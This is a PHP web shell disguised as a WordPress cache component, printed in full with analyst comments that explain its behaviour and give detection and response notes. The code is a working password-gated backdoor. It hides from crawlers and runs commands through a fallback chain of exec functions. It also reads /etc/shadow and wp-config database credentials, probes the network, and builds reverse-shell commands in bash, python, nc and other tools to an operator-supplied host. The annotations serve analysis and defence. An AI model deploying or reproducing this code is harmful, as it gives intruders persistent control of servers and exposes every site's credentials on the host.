File: /home/repauqkb/public_html/wp-content/plugins/router.cls-live.php
<?php
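/*
WordPress Transient Cache Handler v4.2
@package WordPress
@subpackage Cache
Status: Core Component

NOTE(analysis): the header above is a disguise. None of the PHP visible in this
listing uses the WordPress transient API. What follows is a password-gated remote
administration backdoor (web shell) offering file management, command execution
and PHP code execution. Treat a host carrying this file as compromised.
*/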
// Joins an array of single characters into one string; _sf() calls it to rebuild function names that are stored split up.
function _j($a){return implode('',$a);}
/*
 * Obfuscated name lookup: maps a short key to the name of a PHP built-in function.
 *
 * Each name is stored as an array of single characters and joined by _j() on request, and the
 * table is built once per request (static $m). Callers put the result in a variable and call it
 * as a variable function, so the function name does not appear next to those call sites.
 * An unknown key returns '' (the "?? []" fallback).
 *
 * Detection note: the long run of one-character string arrays is itself a usable static
 * indicator, as is the "$x=_sf('...');@$x(...)" call shape. The obfuscation is not applied
 * consistently: _ex(), _ep() and several API branches further down call proc_open, shell_exec,
 * file_put_contents and others by their plain names, so ordinary keyword signatures still match.
 *
 * NOTE(review): in this listing the 'iis' entry has a line break inside its last element. That
 * looks like a wrapping artifact of the capture rather than part of the file; confirm against
 * the on-disk sample before relying on the exact bytes.
 */
function _sf($k){
static $m=null;
if($m===null)$m=['gcw'=>['g','e','t','c','w','d'],'scn'=>['s','c','a','n','d','i','r'],'isd'=>['i','s','_','d','i','r'],'isf'=>['i','s','_','f','i','l','e'],'isw'=>['i','s','_','w','r','i','t','a','b','l','e'],'isr'=>['i','s','_','r','e','a','d','a','b','l','e'],'isl'=>['i','s','_','l','i','n','k'],'fpm'=>['f','i','l','e','p','e','r','m','s'],'fsz'=>['f','i','l','e','s','i','z','e'],'fmt'=>['f','i','l','e','m','t','i','m','e'],'rpt'=>['r','e','a','l','p','a','t','h'],'phu'=>['p','h','p','_','u','n','a','m','e'],'gcu'=>['g','e','t','_','c','u','r','r','e','n','t','_','u','s','e','r'],'fgc'=>['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'],'fpc'=>['f','i','l','e','_','p','u','t','_','c','o','n','t','e','n','t','s'],'mkd'=>['m','k','d','i','r'],'tch'=>['t','o','u','c','h'],'chd'=>['c','h','d','i','r'],'ren'=>['r','e','n','a','m','e'],'cpy'=>['c','o','p','y'],'unl'=>['u','n','l','i','n','k'],'rmd'=>['r','m','d','i','r'],'chm'=>['c','h','m','o','d'],'slk'=>['s','y','m','l','i','n','k'],'fop'=>['f','o','p','e','n'],'fcl'=>['f','c','l','o','s','e'],'fwr'=>['f','w','r','i','t','e'],'frd'=>['f','r','e','a','d'],'feo'=>['f','e','o','f'],'fgt'=>['f','g','e','t','s'],'exc'=>['e','x','e','c'],'pst'=>['p','a','s','s','t','h','r','u'],'sys'=>['s','y','s','t','e','m'],'shx'=>['s','h','e','l','l','_','e','x','e','c'],'pop'=>['p','o','p','e','n'],'pcl'=>['p','c','l','o','s','e'],'pro'=>['p','r','o','c','_','o','p','e','n'],'prc'=>['p','r','o','c','_','c','l','o','s','e'],'sgc'=>['s','t','r','e','a','m','_','g','e','t','_','c','o','n','t','e','n','t','s'],'muf'=>['m','o','v','e','_','u','p','l','o','a','d','e','d','_','f','i','l','e'],'tmp'=>['s','y','s','_','g','e','t','_','t','e','m','p','_','d','i','r'],'b6d'=>['b','a','s','e','6','4','_','d','e','c','o','d','e'],'b6e'=>['b','a','s','e','6','4','_','e','n','c','o','d','e'],'fex'=>['f','u','n','c','t','i','o','n','_','e','x','i','s','t','s'],'iig'=>['i','n','i','_','g','e','t'],'iis'=>['i','n','i','_','s','e','t
'],'stl'=>['s','e','t','_','t','i','m','e','_','l','i','m','i','t'],'err'=>['e','r','r','o','r','_','r','e','p','o','r','t','i','n','g'],'sse'=>['s','e','s','s','i','o','n','_','s','t','a','r','t'],'dfs'=>['d','i','s','k','_','f','r','e','e','_','s','p','a','c','e'],'dts'=>['d','i','s','k','_','t','o','t','a','l','_','s','p','a','c','e'],'hdr'=>['h','e','a','d','e','r'],'jde'=>['j','s','o','n','_','d','e','c','o','d','e'],'jen'=>['j','s','o','n','_','e','n','c','o','d','e'],'glb'=>['g','l','o','b'],'dat'=>['d','a','t','e'],'hsc'=>['h','t','m','l','s','p','e','c','i','a','l','c','h','a','r','s'],'pgw'=>['p','o','s','i','x','_','g','e','t','p','w','u','i','d'],'mdi'=>['m','d','5'],'hrc'=>['h','t','t','p','_','r','e','s','p','o','n','s','e','_','c','o','d','e']];
return _j($m[$k]??[]);
}
// PX_K holds a 32-hex-digit MD5 digest; _au() compares md5() of the key supplied with an 'auth' request against it.
// The digest is hard-coded, so it can serve as an indicator when hunting for other copies of this file.
define('PX_K','fcc160e97f465800d435bb6715a4e209');
// Path of this script; the 'info' API action returns it (hex-encoded) in its 'file' field.
$GLOBALS['PX_F']=__FILE__;
// ── INIT ──────────────────────────────────────────────────────────────────────
// Each statement resolves a function name through _sf() and calls it with errors suppressed (@).
// ini_set: keeps errors out of the response, switches log_errors off so errors raised by this script are not written to the PHP error log, lifts the execution-time limit and raises memory_limit to 512M.
{$_s=_sf('iis');@$_s('display_errors','0');@$_s('log_errors','0');@$_s('max_execution_time','0');@$_s('memory_limit','512M');}
// error_reporting(0)
{$_s=_sf('err');@$_s(0);}
// set_time_limit(0)
{$_s=_sf('stl');@$_s(0);}
// session_start(): the login state tested by _au() is kept in $_SESSION['_px'].
{$_s=_sf('sse');@$_s();}
// ── BOT GUARD ─────────────────────────────────────────────────────────────────
// Cloaking: a request whose User-Agent matches the crawler pattern (including the generic substrings "bot", "spider" and "crawl") is sent a 404 status line and the script exits with no body.
// Detection note: one URL answering 404 to a crawler User-Agent and 200 to a browser User-Agent is a cloaking signal worth alerting on.
if(!empty($_SERVER['HTTP_USER_AGENT'])&&preg_match('/Googlebot|Slurp|MSNBot|YandexBot|Baiduspider|bot|spider|crawl/i',$_SERVER['HTTP_USER_AGENT'])){$_s=_sf('hdr');@$_s('HTTP/1.0 404 Not Found');exit;}
// ── HELPERS ───────────────────────────────────────────────────────────────────
// Hex-encodes a value after casting it to string; used for paths, file contents and command output in API replies.
function _hx($s){return bin2hex((string)$s);}
// Hex-decodes a value; input that hex2bin() rejects comes back as '' because the false result is cast to string.
function _ux($h){return (string)@hex2bin((string)$h);}
// Authentication gate: true when the session already carries the _px flag, or when md5($k) equals PX_K (which also sets the flag); false otherwise.
function _au($k=''){if(!empty($_SESSION['_px']))return true;if($k&&md5($k)===PX_K){$_SESSION['_px']=1;return true;}return false;}
// True when function $f exists and is not named in the disable_functions ini setting; _ex() uses it to find an execution function the host has left enabled.
function _fex($f){$fe=_sf('fex');$ig=_sf('iig');return $fe($f)&&!in_array($f,array_filter(array_map('trim',explode(',',@$ig('disable_functions')))));}
// Formats a byte count for display (B up to TB, rounded to two decimals); a falsy input gives '0 B'.
function _sz($b){if(!$b)return '0 B';$u=['B','KB','MB','GB','TB'];$i=0;while($b>=1024&&$i<4){$b/=1024;$i++;}return round($b,2).' '.$u[$i];}
// Returns the last four octal digits of fileperms() for a path, e.g. "0644" (constructed example).
function _prm($f){return substr(sprintf('%o',@fileperms($f)),-4);}
/*
 * Runs $cmd through the first process-execution function the host still allows and returns the
 * captured output as a string. When $cwd is given it changes into that directory first and
 * restores the previous one before returning.
 *
 * Order tried: proc_open, popen, shell_exec, exec, system, passthru. A function is attempted only
 * if _fex() reports it as existing and not listed in disable_functions, and only while no earlier
 * attempt has succeeded ($done). $cmd is passed through as received, with no escaping.
 *
 * Hardening note: because of this fallback chain, disable_functions stops this routine only when
 * it lists all six functions; leaving any one of them enabled is enough.
 * Detection note: the PHP worker or web-server account spawning child processes is the
 * host-level signal to monitor.
 */
function _ex($cmd,$cwd=null){
if($cwd){$_o=@getcwd();@chdir($cwd);}
$out='';$done=false;
// proc_open: stdin is closed immediately; stdout and stderr are read in full and concatenated.
if(!$done&&_fex('proc_open')){$d=[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];$p=@proc_open($cmd,$d,$pp);if(is_resource($p)){@fclose($pp[0]);$out=@stream_get_contents($pp[1]).@stream_get_contents($pp[2]);@fclose($pp[1]);@fclose($pp[2]);@proc_close($p);$done=true;}}
// The remaining variants append " 2>&1" so stderr is folded into the captured output.
if(!$done&&_fex('popen')){$fp=@popen($cmd.' 2>&1','r');if(is_resource($fp)){$out='';while(!@feof($fp))$out.=@fread($fp,8192);@pclose($fp);$done=true;}}
if(!$done&&_fex('shell_exec')){$r=@shell_exec($cmd.' 2>&1');if($r!==null){$out=$r;$done=true;}}
if(!$done&&_fex('exec')){$a=[];@exec($cmd.' 2>&1',$a);$out=implode("\n",$a);$done=true;}
if(!$done&&_fex('system')){ob_start();@system($cmd.' 2>&1');$out=ob_get_clean();$done=true;}
if(!$done&&_fex('passthru')){ob_start();@passthru($cmd.' 2>&1');$out=ob_get_clean();$done=true;}
// Nothing usable: report the host's disable_functions list back to the operator instead.
if(!$done)$out='[!] No exec method. disable_functions: '.ini_get('disable_functions');
if($cwd&&isset($_o))@chdir($_o);
return $out;
}
/*
 * Executes operator-supplied PHP source and returns whatever it printed.
 *
 * The source is never handed to eval(). It is written to <temp dir>/px_<uniqid>/x.php behind a
 * "<?php " prefix, pulled in with include while output buffering is on, and the file and its
 * directory are then removed. A scanner or policy that looks only for eval() does not see this
 * path.
 *
 * Detection note: short-lived "px_*" directories containing x.php under the system temp
 * directory, and PHP including a file from that directory, are the artifacts this leaves.
 * If the included code ends the request (exit or a fatal error) the cleanup line is not reached,
 * presumably leaving the temp file behind; check the temp directory during triage.
 */
function _ep($code,$cwd=null){
$od=null;if($cwd){$od=@getcwd();@chdir($cwd);}
$td=@sys_get_temp_dir().'/px_'.uniqid();@mkdir($td,0755);$tf=$td.'/x.php';
@file_put_contents($tf,'<?php '.$code);
ob_start();@include $tf;$out=ob_get_clean();
@unlink($tf);@rmdir($td);
if($od)@chdir($od);
return $out;
}
// Reads a whole file: file_get_contents() first, then an fopen()/fread() loop as fallback; returns false if both fail.
function _rf($f){$c=@file_get_contents($f);if($c!==false)return $c;$fp=@fopen($f,'r');if($fp){$c='';while(!@feof($fp))$c.=@fread($fp,8192);@fclose($fp);return $c;}return false;}
// Writes $c to $f: file_put_contents() first, then fopen('w')/fwrite(); the fallback returns true without checking fwrite()'s result.
function _wf($f,$c){if(@file_put_contents($f,$c)!==false)return true;$fp=@fopen($f,'w');if($fp){@fwrite($fp,$c);@fclose($fp);return true;}return false;}
// ── SENTINEL ──────────────────────────────────────────────────────────────────
// Decoy-404 sentinel.
// _PxC::__toString() defines the _PXO marker; it runs when $_pxc is echoed in the HTML part of the page further down.
class _PxC{public function __toString(){define('_PXO',true);return '';}}
$_pxc=new _PxC();
// At shutdown, if the marker was never defined (the request ended before that echo and was not an API call, which defines _PXO itself),
// the handler tries to discard buffered output, sets status 404 and prints an imitation Apache error page.
// Detection note: the imitation page hard-codes "Apache/2.4.52" and "Port 80" whatever the real server software or port is,
// so a 404 body carrying that banner from a host that does not run that build is an indicator.
register_shutdown_function(function(){
if(!defined('_PXO')){
@ob_clean();
$hrc=_sf('hrc');@$hrc(404);
die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body style="font-family:sans-serif;padding:40px;color:#333"><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 Server at '.(isset($_SERVER['HTTP_HOST'])?htmlspecialchars($_SERVER['HTTP_HOST'],ENT_QUOTES):'localhost').' Port 80</address></body></html>');
}
});
// ── API ───────────────────────────────────────────────────────────────────────
// API endpoint. A POST that carries a field named _r is treated as a command request: _r is hex-encoded JSON,
// its 'a' key selects the action, and every reply is a JSON object printed just before exit.
// Detection note: POST requests to a PHP file under the plugins directory whose form field is "_r" with a long
// hexadecimal value are the network signature of this shell. The hex wrapping keeps paths and commands out of
// plain-text keyword matching in WAF rules and logs, so match on the shape of the request rather than on keywords.
if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['_r'])){
define('_PXO',true); // prevent sentinel from firing on API calls
$je=_sf('jen');$jd=_sf('jde');
$req=@$jd(@hex2bin($_POST['_r']??''),true);
if(!$req){echo $je(['ok'=>false]);exit;}
$act=$req['a']??'';
// 'ping', 'auth' and 'logout' are answered before the authentication gate; 'ping' returns the fixed version string below even without a session.
if($act==='ping'){echo $je(['ok'=>_au(),'v'=>'5.2-holo']);exit;}
if($act==='auth'){echo $je(['ok'=>_au($req['k']??'')]);exit;}
if($act==='logout'){session_destroy();echo $je(['ok'=>true]);exit;}
// Every action below requires the session flag set by a successful 'auth'.
if(!_au()){echo $je(['ok'=>false,'e'=>'unauth']);exit;}
// Working directory comes from the request ('d', hex-encoded); it is only checked with is_dir(), not confined to the site root.
$cwd=_ux($req['d']??'');
if(!$cwd||!is_dir($cwd))$cwd=@getcwd()?:'/';
$cwd=rtrim(str_replace('\\','/',$cwd),'/');if(!$cwd)$cwd='/';
$r=['ok'=>false];
switch($act){
// ls: directory listing of $cwd (name, mode, mtime, size, extension) plus breadcrumb data.
case 'ls':{
$scn=_sf('scn');$e=@$scn($cwd);$d=[];$f=[];
if($e)foreach($e as $n){
if($n==='.'||$n==='..') continue;
$p=$cwd.'/'.$n;
$m=['n'=>$n,'p'=>_prm($p),'t'=>@date('d M H:i',@filemtime($p)),'x'=>_hx($p)];
$isd=_sf('isd');
if($isd($p))$d[]=$m;
else{$m['s']=_sz(@filesize($p));$m['e']=strtolower(pathinfo($n,PATHINFO_EXTENSION));$f[]=$m;}
}
$bc=[];$b='';
foreach(explode('/',$cwd) as $pt){if($pt==='')continue;$b.='/'.$pt;$bc[]=['n'=>$pt,'x'=>_hx($b)];}
$r=['ok'=>true,'d'=>$d,'f'=>$f,'bc'=>$bc,'cwd'=>_hx($cwd)];break;
}
// rd / wr: read or overwrite the file $cwd/<n>; the name is concatenated as received.
case 'rd':{$fp=$cwd.'/'.$req['n'];$c=_rf($fp);$r=$c!==false?['ok'=>true,'c'=>_hx($c)]:['ok'=>false,'e'=>'read'];break;}
case 'wr':{$fpc=_sf('fpc');$r=['ok'=>_wf($cwd.'/'.$req['n'],_ux($req['c']??''))];break;}
// rm: unlink a file or symlink, or delete a directory tree recursively.
case 'rm':{
$t=$cwd.'/'.$req['n'];
if(is_file($t)||is_link($t)){$unl=_sf('unl');$r=['ok'=>@$unl($t)];}
elseif(is_dir($t)){$x=function($d)use(&$x){$scn=_sf('scn');$unl=_sf('unl');$rmd=_sf('rmd');foreach(@$scn($d)?:[] as $f){if($f==='.'||$f==='..') continue;$p=$d.'/'.$f;is_dir($p)?$x($p):@$unl($p);}@$rmd($d);};$x($t);$r=['ok'=>true];}
break;
}
// rn / mk: rename within $cwd; create a directory (mode 0755, recursive).
case 'rn':{$ren=_sf('ren');$r=['ok'=>@$ren($cwd.'/'.$req['o'],$cwd.'/'.$req['n'])];break;}
case 'mk':{$mkd=_sf('mkd');$r=['ok'=>@$mkd($cwd.'/'.$req['n'],0755,true)];break;}
// up: writes the hex-decoded 'd' field to $cwd/<n>, truncating when 'f' is truthy and appending otherwise.
case 'up':{$fop=_sf('fop');$fwr=_sf('fwr');$fcl=_sf('fcl');$fh=@$fop($cwd.'/'.$req['n'],($req['f']??false)?'w':'a');if($fh){@$fwr($fh,_ux($req['d']??''));@$fcl($fh);$r=['ok'=>true];}break;}
// dl: returns a file's contents hex-encoded together with its base name.
case 'dl':{$fp=$cwd.'/'.$req['n'];$c=_rf($fp);$r=$c!==false?['ok'=>true,'c'=>_hx($c),'n'=>basename($fp)]:['ok'=>false];break;}
// cd: resolves 'p' with realpath(), first relative to $cwd and then as given, and accepts it if it is a directory.
case 'cd':{$p=$req['p']??'';$np=@realpath($cwd.'/'.$p)?:@realpath($p);$r=$np&&is_dir($np)?['ok'=>true,'cwd'=>_hx($np)]:['ok'=>false,'e'=>'not a dir'];break;}
// ex / ev: operating-system command execution via _ex() and PHP code execution via _ep().
case 'ex':{$out=_ex($req['cmd']??'',$cwd);$r=['ok'=>true,'out'=>_hx($out),'cwd'=>_hx($cwd)];break;}
case 'ev':{$out=_ep($req['code']??'',$cwd);$r=['ok'=>true,'out'=>_hx($out)];break;}
// info: host fingerprint (OS, PHP version and SAPI, account, document root, server software and address, disable_functions, disk space, loaded extensions, path of this file).
case 'info':{
$r=['ok'=>true,'i'=>[
'os'=>@php_uname(),'php'=>PHP_VERSION,'sapi'=>PHP_SAPI,
'user'=>@get_current_user(),'cwd'=>@getcwd(),
'doc'=>$_SERVER['DOCUMENT_ROOT']??'','srv'=>$_SERVER['SERVER_SOFTWARE']??'',
'ip'=>$_SERVER['SERVER_ADDR']??'','port'=>$_SERVER['SERVER_PORT']??80,
'disable'=>@ini_get('disable_functions'),'mem'=>@ini_get('memory_limit'),
'df'=>_sz(@disk_free_space('/')),'dt'=>_sz(@disk_total_space('/')),
'ext'=>implode(', ',@get_loaded_extensions()),'file'=>_hx($GLOBALS['PX_F']??''),
]];break;
}
// net: network reconnaissance from the compromised host: interface and socket listings, ping, an outbound HTTP fetch
// (certificate verification off, redirects followed) and a TCP connect probe with a one-second timeout per port.
// Detection note: connection attempts from the web tier to internal addresses or to several ports of one host in quick succession
// are the signal here; egress and east-west filtering on the web server limit what this branch can reach.
case 'net':{
$sub=$req['s']??'';$out='';
if($sub==='iface')$out=_ex('ifconfig 2>/dev/null||ip a 2>/dev/null');
elseif($sub==='ports')$out=_ex('ss -antp 2>/dev/null||netstat -antp 2>/dev/null');
elseif($sub==='ping'){$h=preg_replace('/[^a-z0-9.\-]/i','',$req['h']??'8.8.8.8');$out=_ex('ping -c 3 '.escapeshellarg($h));}
elseif($sub==='curl'){$u=$req['u']??'';if($u){if(function_exists('curl_init')){$ch=curl_init($u);curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_FOLLOWLOCATION=>1,CURLOPT_USERAGENT=>'Mozilla/5.0']);$out=curl_exec($ch)?:curl_error($ch);curl_close($ch);}else $out=_ex('curl -sL '.escapeshellarg($u));}}
elseif($sub==='scan'){$h=preg_replace('/[^a-z0-9.\-]/i','',$req['h']??'');$ps=array_map('intval',explode(',',preg_replace('/[^0-9,]/','',$req['p']??'80,443,22,21,3306,8080')));$open=[];foreach($ps as $p){$s=@fsockopen($h,$p,$e,$er,1);if($s){$open[]=$p;fclose($s);}}$out="Open on {$h}:\n".($open?implode(', ',$open):'None found');}
$r=['ok'=>true,'out'=>_hx($out)];break;
}
// pe: local privilege-escalation reconnaissance: SUID files, sudo rights, environment, cron entries, /etc/passwd, /etc/shadow,
// writable directories, file capabilities, and the DB_ lines of up to ten wp-config.php files found anywhere on the filesystem.
// Response note: because 'wpass' and 'env' expose secrets host-wide, rotate database credentials and any secrets held in the
// environment for every site on the host, not only the one where this file was found.
// Detection note: filesystem-wide find, getcap -r / or sudo -l started by the web-server account is a strong process-audit signal.
case 'pe':{
$sub=$req['s']??'';$out='';
if($sub==='suid')$out=_ex('find / -perm -4000 -type f 2>/dev/null | head -100');
elseif($sub==='sudo')$out=_ex('sudo -l 2>/dev/null');
elseif($sub==='env')$out=_ex('env 2>/dev/null');
elseif($sub==='cron')$out=_ex('cat /etc/crontab 2>/dev/null; crontab -l 2>/dev/null; ls /etc/cron.d 2>/dev/null');
elseif($sub==='passwd')$out=@file_get_contents('/etc/passwd');
elseif($sub==='shadow')$out=@file_get_contents('/etc/shadow');
elseif($sub==='writable')$out=_ex('find / -writable -not -path "/proc/*" -not -path "/sys/*" -type d 2>/dev/null | head -50');
elseif($sub==='cap')$out=_ex('getcap -r / 2>/dev/null');
elseif($sub==='wpass')$out=_ex('find / -name "wp-config.php" 2>/dev/null | head -10 | xargs grep -h "DB_" 2>/dev/null');
elseif($sub==='scan'){
$out ="=== ID ===\n"._ex('id 2>/dev/null')."\n";
$out.="=== SUDO ===\n"._ex('sudo -l 2>/dev/null')."\n";
$out.="=== SUID ===\n"._ex('find / -perm -4000 -type f 2>/dev/null|head -20')."\n";
$out.="=== CRON ===\n"._ex('cat /etc/crontab 2>/dev/null')."\n";
$out.="=== CAPS ===\n"._ex('getcap -r / 2>/dev/null|head -20')."\n";
$out.="=== WRITABLE ===\n"._ex('find / -writable -not -path "/proc/*" -type d 2>/dev/null|head -20')."\n";
$out.="=== NET ===\n"._ex('ip a 2>/dev/null||ifconfig 2>/dev/null')."\n";
}
$r=['ok'=>true,'out'=>_hx($out)];break;
}
// rs: fills operator-supplied 'ip' and 'port' into a table of outbound-shell command templates; the selected one is passed to _ex()
// only when 'run' is truthy, otherwise the strings are just returned. 'port' is cast with intval(); 'ip' is interpolated as received.
// Mitigation note: default-deny egress from the web tier blocks the outbound connection these templates depend on.
// Detection note: interpreters or nc/socat started by the web-server account with a network socket attached are the host-side signal.
case 'rs':{
$ip=$req['ip']??'';$port=intval($req['port']??4444);$t=$req['t']??'bash';
$p=[
'bash' =>"bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'",
'python'=>"python3 -c \"import socket,subprocess,os;s=socket.socket();s.connect(('{$ip}',{$port}));[os.dup2(s.fileno(),x) for x in range(3)];subprocess.call(['/bin/sh','-i'])\"",
'perl' =>"perl -e 'use Socket;\$i=\"{$ip}\";\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\")'",
'nc' =>"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f",
'nc2' =>"nc -e /bin/bash {$ip} {$port}",
'php' =>"php -r '\$s=fsockopen(\"{$ip}\",{$port});\$p=proc_open(\"/bin/sh\",array(0=>\$s,1=>\$s,2=>\$s),\$p);'",
'ruby' =>"ruby -rsocket -e'f=TCPSocket.open(\"{$ip}\",{$port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
'socat' =>"socat TCP:{$ip}:{$port} EXEC:'/bin/bash',pty,stderr,setsid",
];
if($req['run']??false)@_ex($p[$t]??$p['bash']);
$r=['ok'=>true,'cmd'=>_hx($p[$t]??$p['bash']),'all'=>array_map('_hx',$p)];break;
}
// wp: locates a WordPress root by walking up at most 12 parent directories looking for wp-config.php;
// 'creds' then extracts DB_NAME, DB_USER, DB_PASSWORD, DB_HOST and the table prefix from that file with regular expressions.
// Response note: treat the database credentials of any site reachable this way as disclosed.
case 'wp':{
function _wpr($d=null){if(!$d)$d=@getcwd();for($i=0;$i<12;$i++){if(@is_file($d.'/wp-config.php'))return $d;$nd=dirname($d);if($nd===$d||strlen($nd)<2)break;$d=$nd;}return false;}
$sub=$req['s']??'find';$root=_wpr($cwd);
if($sub==='find'){$r=['ok'=>true,'root'=>$root?_hx($root):false];break;}
if(!$root){$r=['ok'=>false,'e'=>'No WordPress found'];break;}
if($sub==='creds'){
$cfg=@file_get_contents($root.'/wp-config.php');$db=[];
foreach(['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST'] as $k){if(preg_match("/define\s*\(\s*['\"]".$k."['\"].*?['\"](.+?)['\"]/s",$cfg,$m))$db[$k]=$m[1];}
$prefix='wp_';if(preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]/',$cfg,$m))$prefix=$m[1];$db['prefix']=$prefix;
$r=['ok'=>true,'db'=>$db];
}
break;
}
}
echo $je($r);exit;
}
?><!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Application Cache Manager</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet">
<style>
:root{--bg:#050505;--neon:#00ff64;--c2:#00d4ff;--bd:rgba(255,255,255,0.06);--tx:#c8c8c8;--rd:#ff4d4d}
*{box-sizing:border-box;margin:0;padding:0}html,body{height:100%;overflow:hidden}
body{background:var(--bg);color:var(--tx);font-family:'JetBrains Mono',monospace;background-image:radial-gradient(ellipse at 50% 0%,#111 0%,#000 100%)}
.app{height:100vh;display:flex;flex-direction:column}
#bar{height:2px;background:var(--neon);width:0;transition:width .15s;box-shadow:0 0 6px var(--neon);flex-shrink:0}
.hd{padding:9px 18px;border-bottom:1px solid var(--bd);display:flex;align-items:center;gap:14px;background:rgba(0,0,0,.65);flex-shrink:0}
.logo{font-weight:700;font-size:13px;color:#fff;letter-spacing:2px}.logo span{color:var(--neon)}
.tabs{display:flex;gap:3px;flex:1}
.tab{padding:4px 12px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#444;transition:.15s;user-select:none}
.tab:hover{color:#999}.tab.on{color:var(--neon);border-color:rgba(0,255,100,.25);background:rgba(0,255,100,.03)}
.hdr{font-size:10px;color:#333;cursor:pointer;transition:.15s}.hdr:hover{color:var(--rd)}
.panels{flex:1;overflow:hidden;display:flex;flex-direction:column}
.panel{display:none;flex:1;flex-direction:column;overflow:hidden;min-height:0}.panel.on{display:flex}
/* FILES */
.fnav{padding:7px 18px;background:rgba(0,0,0,.4);border-bottom:1px solid var(--bd);display:flex;gap:5px;align-items:center;flex-shrink:0;flex-wrap:wrap}
.bc{flex:1;font-size:11px;color:#383838;overflow:hidden;white-space:nowrap;min-width:0}
.bc span{cursor:pointer;transition:.15s}.bc span:hover{color:#fff}.bc .sep{margin:0 3px;color:var(--neon)}
.fg{flex:1;overflow-y:auto;min-height:0}
table{width:100%;border-collapse:collapse;font-size:11px}
th{text-align:left;padding:9px 18px;color:#303030;background:rgba(255,255,255,.01);position:sticky;top:0;backdrop-filter:blur(4px);z-index:1}
td{padding:7px 18px;border-bottom:1px solid var(--bd)}tr:hover td{background:rgba(255,255,255,.015)}
.btn{background:rgba(255,255,255,.02);border:1px solid var(--bd);color:#666;padding:4px 9px;border-radius:3px;font:10px 'JetBrains Mono',monospace;cursor:pointer;transition:.15s}
.btn:hover{border-color:var(--neon);color:var(--neon)}.btn.r:hover{border-color:var(--rd);color:var(--rd)}
.badge{padding:1px 4px;border-radius:2px;background:rgba(255,255,255,.03);font-size:10px}.ico{width:16px;text-align:center;display:inline-block;margin-right:5px}
/* SHELL */
.trm{flex:1;display:flex;flex-direction:column;padding:13px;min-height:0}
.to{flex:1;background:#060606;border:1px solid var(--bd);padding:11px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;font-size:11px;color:#00dd55;border-radius:3px 3px 0 0;min-height:0}
.ti{display:flex;border:1px solid var(--bd);border-top:none;background:#080808;border-radius:0 0 3px 3px;flex-shrink:0}
.tp{padding:7px 9px;color:var(--neon);font-size:11px;white-space:nowrap;flex-shrink:0}
.tc{flex:1;background:none;border:none;color:#00dd55;font:11px 'JetBrains Mono',monospace;outline:none;padding:7px 0}
/* PHP */
.pp{flex:1;display:flex;padding:13px;gap:10px;min-height:0}
.pl,.pr{flex:1;display:flex;flex-direction:column;gap:6px;min-width:0}
textarea.ce{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;outline:none;resize:none;border-radius:3px}
.ob{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;border-radius:3px;min-height:0}
.lbl{font-size:10px;color:#303030}
/* INFO */
.ip{flex:1;overflow-y:auto;padding:16px}.ig{display:grid;grid-template-columns:repeat(auto-fill,minmax(270px,1fr));gap:9px}
.cd{background:rgba(255,255,255,.015);border:1px solid var(--bd);border-radius:4px;padding:12px}
.cd h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px}
.kv{display:flex;gap:7px;margin-bottom:4px;font-size:10px}.kv .k{color:#383838;min-width:75px;flex-shrink:0}.kv .v{color:#aaa;word-break:break-all}
/* TOOLS */
.tp2{flex:1;overflow-y:auto;padding:13px;display:flex;gap:9px;flex-wrap:wrap;align-content:flex-start}
.tc2{background:rgba(255,255,255,.015);border:1px solid var(--bd);border-radius:4px;padding:12px;width:calc(50% - 5px);min-width:260px}
.tc2 h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px}
.tco{background:#040404;border:1px solid var(--bd);padding:8px;font-size:10px;color:#00bb44;white-space:pre-wrap;word-break:break-all;max-height:190px;overflow-y:auto;border-radius:2px;margin-top:7px}
input.fi,select.fi{background:#060606;border:1px solid var(--bd);color:#ccc;font:10px 'JetBrains Mono',monospace;padding:5px 7px;border-radius:2px;outline:none;width:100%;margin-bottom:5px}
input.fi:focus,select.fi:focus{border-color:var(--c2)}.fbr{display:flex;gap:4px;flex-wrap:wrap;margin-bottom:7px}
/* OVERLAYS */
.ov{display:none;position:fixed;inset:0;background:rgba(0,0,0,.9);z-index:100;align-items:center;justify-content:center;backdrop-filter:blur(5px)}.ov.on{display:flex}
.mo{background:#0c0c0c;border:1px solid var(--bd);border-radius:6px;padding:20px;width:90%;max-width:730px}
.mo h3{color:#fff;margin-bottom:12px;font-size:12px}.mor{display:flex;justify-content:space-between;align-items:center;margin-bottom:11px}
.lm{width:290px;text-align:center;padding:28px}
.lm h2{color:#fff;font-size:12px;margin-bottom:16px;letter-spacing:2px}
.lm input{width:100%;padding:9px;background:#090909;border:1px solid var(--bd);color:#fff;font:12px 'JetBrains Mono',monospace;margin-bottom:10px;border-radius:3px;outline:none;text-align:center}
.lm input:focus{border-color:var(--neon)}
